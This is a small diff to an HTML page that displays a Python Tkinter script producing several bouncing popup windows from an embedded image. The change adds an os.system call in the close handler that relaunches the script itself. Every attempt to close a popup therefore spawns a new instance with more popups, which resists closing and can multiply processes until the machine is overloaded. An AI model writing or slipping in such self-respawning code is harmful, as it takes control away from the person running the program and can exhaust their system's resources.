--- a/page.html
+++ b/page.html
@@ -6,6 +6,7 @@
   <p>from PIL import Image, ImageTk</p>
   <p>import random</p>
   <p>import sys</p>
+  <p>import os</p>
   <p> </p>
   <p>class BouncingPopup:</p>
   <p>    def __init__(self, root, embedded_image, screen_width, screen_height):</p>
@@ -38,6 +39,7 @@
   <p>        self.popup.after(20, self.move_popup)</p>
   <p>    def on_close(self):</p>
   <p>        self.popup.destroy()</p>
+  <p>        os.system('python {}'.format(os.path.abspath(__file__)))</p>
   <p>        sys.exit()</p>
   <p> </p>
   <p>def create_multiple_popups(embedded_image, num_popups):</p>
